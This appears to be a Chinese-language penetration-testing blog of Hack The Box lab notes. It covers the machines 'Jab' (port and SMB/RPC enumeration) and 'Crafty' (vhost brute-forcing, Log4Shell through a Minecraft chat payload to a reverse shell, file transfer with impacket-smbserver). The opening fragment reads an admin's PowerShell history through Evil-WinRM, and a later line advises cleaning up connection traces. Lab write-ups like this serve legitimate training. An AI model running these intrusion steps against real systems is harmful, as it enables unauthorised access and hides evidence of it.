+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program files> cat c:/users/henry.vinson/appdata/roaming/microsoft/windows/powershell/psreadline/consolehost_history.txt
Cannot find path 'C:\users\henry.vinson\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt' because it does not exist.
At line:1 char:1
+ cat c:/users/henry.vinson/appdata/roaming/microsoft/windows/powershel ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\users\henry....ost_history.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program files> cat c:/users/henry.vinson_adm/appdata/roaming/microsoft/windows/powershell/psreadline/consolehost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}
说明当前用户
总结
.....
Jab
机器介绍
难度
Medium
信息搜集
tcp全端口扫描:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap -sT --min-rate 10000 -p- 10.129.116.140 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 16:41 CST
Warning: 10.129.116.140 giving up on port because retransmission cap hit (10).
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 42.82% done; ETC: 16:44 (0:01:40 remaining)
Stats: 0:02:48 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 98.46% done; ETC: 16:44 (0:00:03 remaining)
Nmap scan report for 10.129.116.140
Host is up (0.26s latency).
Not shown: 60209 filtered tcp ports (no-response), 5320 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3269/tcp open globalcatLDAPssl
5270/tcp open xmp
Nmap done: 1 IP address (1 host up) scanned in 178.76 seconds
处理信息:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# tcports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# export $tcports
export: not an identifier: 53,135,139,445,3269,5270
tcp详细扫描:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap -sT -sC -sV -O -p53,135,139,445,3269,5270 10.129.116.140 -oA nmapscan/tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 16:52 CST
Nmap scan report for 10.129.116.140
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-01T08:53:32+00:00; -27s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
5270/tcp open ssl/xmpp Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (95%), Microsoft Windows 10 1709 - 1909 (92%), Microsoft Windows Server 2012 (91%), Microsoft Windows Vista SP1 (90%), Microsoft Windows Longhorn (90%), Microsoft Windows 10 1709 - 1803 (88%), Microsoft Windows 10 1809 - 2004 (88%), Microsoft Windows Server 2012 R2 (88%), Microsoft Windows Server 2012 R2 Update 1 (88%), Microsoft Windows Server 2016 build 10586 - 14393 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -26s, deviation: 0s, median: -27s
| smb2-time:
| date: 2024-03-01T08:53:24
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.41 seconds
udp扫描
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap -sU -p- 1000 10.129.116.140 -oA nmapscan/udports
脚本漏扫
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# nmap --script=vuln -p53,135,139,445,3269,5270 10.129.116.140 -oA nmapscan/tcpvul
n
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 16:53 CST
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 87.59% done; ETC: 16:53 (0:00:01 remaining)
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 88.50% done; ETC: 16:53 (0:00:01 remaining)
Nmap scan report for 10.129.116.140
Host is up (0.31s latency).
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3269/tcp open globalcatLDAPssl
5270/tcp open xmp
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 109.34 seconds
利用
尝试获取smb共享
──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# smbmap -H 10.129.116.140
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. on line 970
Traceback (most recent call last):
File "/usr/bin/smbmap", line 33, in <module>
sys.exit(load_entry_point('smbmap==1.9.2', 'console_scripts', 'smbmap')())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1435, in main
host = [ host for host in share_drives_list.keys() ][0]
^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'bool' object has no attribute 'keys'
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# smbclient -L //10.129.116.140 -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.116.140 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# crackmapexec smb 10.129.116.140
SMB 10.129.116.140 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
尝试连接msrpc
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Jab]
└─# rpcclient -U '' -N 10.129.116.140
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> quit
寻找公开漏洞
总结
Crafty
机器介绍
Crafty is an easy-difficulty Windows machine featuring the exploitation of a `Minecraft` server. Enumerating the version of the server reveals that it is vulnerable to pre-authentication Remote Code Execution (RCE), by abusing `Log4j Injection`. After obtaining a reverse shell on the target, enumerating the filesystem reveals that the administrator composed a Java-based `Minecraft` plugin, which when reverse engineered reveals `rcon` credentials. Those credentials are leveraged with the `RunAs` utility to gain Administrative access, compromising the system.
Crafty 是一款难度简单的 Windows 机器,其特点是利用“Minecraft”服务器。列举服务器版本表明,它很容易通过滥用“Log4j 注入”来攻击预身份验证远程代码执行 (RCE)。在目标上获取反向 shell 后,枚举文件系统显示管理员编写了一个基于 Java 的“Minecraft”插件,该插件在逆向工程时会显示“rcon”凭据。这些凭证与“RunAs”实用程序一起使用,以获得管理访问权限,从而破坏系统。
难度
Easy
信息搜集
tcp详细扫描
┌──(root㉿kali)-[/home/kali/Desktop/htb/Crafty]
└─# nmap -sT -sV -sC -O -p80,25565 $ip1 -oA nmapscan/tcpdetails
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-23 12:20 EDT
Nmap scan report for 10.10.11.249 (10.10.11.249)
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://crafty.htb
|_http-server-header: Microsoft-IIS/10.0
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
探测出的端口有限,只有一个iis开放的web服务和Minecraft游戏服务器,显然web服务优先。另外,这里提到不允许直接跳转到一个url,显然根据经验,每个出现的url我们都要尝试写入到hosts
文件中,这是很关键的。
脚本漏扫
┌──(root㉿kali)-[/home/kali/Desktop/htb/Crafty]
└─# nmap --script=vuln -p80,25565 10.10.11.249 -oA nmapscan/tcpvuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 23:56 EDT
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.03% done; ETC: 23:57 (0:00:01 remaining)
Stats: 0:03:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.51% done; ETC: 00:00 (0:00:01 remaining)
Nmap scan report for crafty.htb (10.10.11.249)
Host is up (0.12s latency).
PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
25565/tcp open minecraft
Nmap done: 1 IP address (1 host up) scanned in 495.65 seconds
无有价值信息。
web初探
访问主页后,又新出现了一个url,同样需要添加到hosts
文件中:
尝试访问新url后发现和原站点看起来几乎没有任何差别,继续探索原站点功能点,点击后都是跳转到http://crafty.htb/coming-soon
。
F12查看源码,初步浏览后也没有发现可疑点。
目录爆破
继续尝试目录爆破,同时用多个常用工具确保结果完整,最终用dirb
、gobuster
、feroxbuster
都无有价值发现。
dns爆破
由于之前提到有个子域名,但访问后与原域名相同内容,我们有理由可以猜测可能还存在其他子域名,尝试爆破,但是结果只扫到已知的子域名。
虚拟主机爆破(视频提示, 子域名爆破中的”亿”点细节)
子域名爆破后无结果,尝试其他也一样,最后观看红笔视频,得到启发,原来是考虑不周到了,除了子域名爆破外,实际上还可以尝试虚拟主机爆破,也就是当某个目标服务器上可能托管多个网站或应用时(比如现实环境中的多租户环境场景),也可能从中发现其他虚拟主机,url的表现形式也是和子域名相同的。所以我们需要将gobuster的扫描模式切换为vhost
,两者原理不同, 所以填写的参数也会略微有些差异, 并且还要注意的是字典中是各个单独项而不是完整的子域名, 所以参数要加上--append-domain
, 另外从已知的域名来看存在重定向的关系,因此还可以加上-r
跟随重定向:
┌──(root㉿kali)-[/home/kali/Desktop/htb/Crafty]
└─# gobuster vhost -u http://10.10.11.249 --domain crafty.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain -r
dns选项主要是通过53端口dns服务器的解析来判断子域名; 而vhost主要是通过捕获到的响应数据包的HOST头, 结合状态码来判断子域名。所以, 如果当没有开放53端口时, 还可以考虑用vhost选项来实现探测子域名。
gobuster的提高效率小tips(视频补充)
gobuster的completion
选项可以很好地改变当前shell对gobuster的交互性, 很有效地改善使用体验, 减少命令的记忆性与繁琐操作(如不记得接下来要填什么参数, 每次都--help), 会较智能化地为我们提供思路, 尤其在现实测试环境中有利于提高效率, 还有其他大型工具如nmap等都有类似的选项。
使用技巧如下:
先查看当前shell环境类型:
┌──(root㉿kali)-[/home/kali]
└─# echo $SHELL
/usr/bin/zsh
使用以下命令可以自动生成改变shell环境脚本:
需要将其附加到当前用户zsh的配置文件~/.zshrc
中, 并让其生效:
此时输入gobuster再tab就是直接显示帮助命令, 而不是默认的shell环境选择文件了, 并且随着命令的不断补充, 会依次逐级提示, 提供更完善的命令帮助, 体验感觉就是跟着我们的思路一步步提供更精确的命令撰写。
渗透陌生端口时的探测方式(视频补充)
比如这里的25565
端口, 熟悉Minecraft游戏的当然一眼就能看出来这通常是联机加入服务器的默认端口, 但假如现在不熟悉, 可以采用下面的方式:
- 浏览器访问
- curl访问
- nc连接目标, 观察反应
出现解码异常, 但暴露出一些信息, 比如这是用java写的。
-L
是跟随重定向, 同样的结果。另外, 尝试nc连接没反应。
探索Minecraft服务器
将openvpn切换成用windows连接,并同样配置好windows的hosts文件,根据经验,如果要成功连接进入一个mc服务器,通常需要本地下载的mc版本和部分mods都对应上,先尝试用任意版本连接服务器查看版本(其实上面nmap也已经扫描到了):
因此要通过本地的1.16.5版本的mc连接。
寻找公开poc
通过以下关键词来寻找我们需要的:
最终在【文章1】中给出了明确的利用方式。
同时,在【文章2】中对log4shell原理部分进行了详细的解释以及小实验演示。
原理很好理解,但是能想到这个漏洞不容易:
获取立足点
利用时注意由于目标是windows,而poc.py
中默认是linux的shell,所以要修改成对应的反弹shell环境:
同时进入Minecraft后,聊天框中输入生成的jndi字符串格式payload,拿到了shell。
rlwrap提高反弹shell交互性(视频补充)
提高交互后,将反弹回来的shell再切换成powershell,此时就可以用gci
等命令快速地获取想要的信息,如:
提权前的枚举
当前用户目录和c盘下的inetpub
网站目录中并没有发现有价值信息,只有两个.jar
包可以尝试提取出来进一步分析,但是目标机器没有安装python,经验不足只能想到该方式,不知道还有哪些其他方式能够提取。
impacket-smbserver传输目标系统文件(视频补充)
即使没有python,但由于目标是windows,因此可以尝试用impacket库提供的工具创建一个smb服务器,利用smb共享来传输文件:
记得别忘了清理连接痕迹!
Comments NOTHING